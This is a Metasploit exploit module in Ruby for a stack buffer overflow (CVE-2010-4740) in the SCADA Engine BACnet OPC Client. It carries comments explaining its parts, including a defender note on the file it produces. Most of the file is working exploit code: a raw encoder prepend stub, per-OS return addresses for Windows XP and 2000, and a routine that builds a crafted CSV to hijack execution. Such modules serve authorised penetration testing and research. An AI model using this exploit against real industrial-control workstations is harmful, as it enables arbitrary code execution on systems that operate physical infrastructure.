GitHub Repository: rapid7/metasploit-framework
Path: blob/master/modules/exploits/windows/fileformat/bacnet_csv.rb
##
# This module requires Metasploit: https://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
# File-format exploit module for the SCADA Engine BACnet OPC Client v1.0.24
# stack buffer overflow (CVE-2010-4740, ICSA-10-264-01). Nothing here talks to
# a network target: `exploit` writes a crafted .csv to disk via the FILEFORMAT
# mixin, and the overflow is triggered only when the vulnerable client parses
# that file. The affected-version range and vendor remediation are in the
# referenced advisory, not restated in this module.
class MetasploitModule < Msf::Exploit::Remote
  Rank = GoodRanking

  # Provides the FILENAME option semantics and `file_create`, used by `exploit`.
  include Msf::Exploit::FILEFORMAT

  # Registers module metadata, payload constraints and per-OS targets with the
  # framework, then adds the FILENAME option for the output file.
  #
  # @param info [Hash] module info merged by `update_info` and passed to `super`
  def initialize(info = {})
    super(
      update_info(
        info,
        'Name' => 'BACnet OPC Client Buffer Overflow',
        'Description' => %q{
          This module exploits a stack buffer overflow in SCADA
          Engine BACnet OPC Client v1.0.24. When the BACnet OPC Client
          parses a specially crafted csv file, arbitrary code may be
          executed.
        },
        'License' => MSF_LICENSE,
        'Author' => [ 'Jeremy Brown', 'MC' ],
        'References' => [
          [ 'CVE', '2010-4740' ],
          [ 'OSVDB', '68096'],
          [ 'BID', '43289' ],
          # ICS-CERT advisory: the authoritative source for affected versions
          # and mitigation guidance.
          [ 'URL', 'https://www.cisa.gov/uscert/ics/advisories/ICSA-10-264-01' ],
        ],
        'DefaultOptions' => {
          'EXITFUNC' => 'process',
        },
        # Payload constraints. `exploit` reserves 750 bytes for
        # `payload.encoded`, so 'Space' => 698 keeps the padding length there
        # non-negative. Declaring every byte outside [A-Za-z0-9] as bad forces
        # an alphanumeric encoding, which fits a text .csv carrier.
        'Payload' => {
          'MinNops' => 0,
          'MaxNops' => 0,
          'Space' => 698,
          'BadChars' => Rex::Text.charset_exclude(Rex::Text::AlphaNumeric),
          'StackAdjustment' => -3500,
          # Raw bytes the framework places ahead of the encoder stub.
          # NOTE(review): presumably this is what leaves the buffer address in
          # ECX for the encoder ('BufferRegister' below) — not verifiable here.
          'PrependEncoder' => "\xeb\x03\x59\xeb\x05\xe8\xf8\xff\xff\xff",
          'EncoderOptions' =>
          {
            'BufferRegister' => 'ECX',
          },
        },
        'Platform' => 'win',
        # 'Ret' is the 32-bit value `exploit` packs into the record after the
        # 185-byte filler; it is OS/service-pack specific, hence one per target.
        'Targets' => [
          [ 'Windows XP SP3 English', { 'Ret' => 0x77e26323 } ],
          [ 'Windows 2000 SP4 English', { 'Ret' => 0x77e14c29 } ],
        ],
        'Privileged' => false,
        'DisclosureDate' => '2010-09-16',
        'DefaultTarget' => 0,
        'Notes' => {
          'Reliability' => UNKNOWN_RELIABILITY,
          'Stability' => UNKNOWN_STABILITY,
          'SideEffects' => UNKNOWN_SIDE_EFFECTS
        }
      )
    )

    # FILENAME is optional (false) and defaults to 'msf.csv'.
    register_options(
      [
        OptString.new('FILENAME', [ false, 'The file name.', 'msf.csv' ]),
      ]
    )
  end

  # Builds the malicious CSV in memory and writes it with `file_create`.
  #
  # The file is a one-line header followed by a single oversized field wrapped
  # in backslashes. Between the backslashes the layout is:
  #   185 bytes  random uppercase-alpha filler (presumably the distance to the
  #              saved return address — inferred from the 'Ret' name, not shown)
  #     4 bytes  target['Ret'], packed little-endian 32-bit ('V')
  #     4 bytes  random uppercase-alpha filler
  #   750 bytes  payload.encoded, padded out with random uppercase alpha
  # followed by the literal tail "\scada,0,0,".
  #
  # Defender note: the observable artifact is a .csv whose second record is a
  # backslash-delimited field of roughly 943 bytes, almost entirely uppercase
  # letters, ending in `\scada,0,0,`. No network activity occurs; the only
  # side effect is the file written to FILENAME.
  def exploit
    csv = "OPC_TAG_NAME,OBJECT_TYPE,INSTANCE,OBJECT_NAME\n\\"
    csv << rand_text_alpha_upper(185)
    # `+` binds tighter than `<<`: the packed address and 4 filler bytes are
    # joined first, then appended as one chunk.
    csv << [target.ret].pack('V') + rand_text_alpha_upper(4)
    # Pad the payload region to a fixed 750 bytes regardless of encoded size.
    csv << payload.encoded + rand_text_alpha_upper(750 - payload.encoded.length)
    csv << "\\scada,0,0,\n"

    print_status("Creating '#{datastore['FILENAME']}' file ...")

    file_create(csv)
  end
end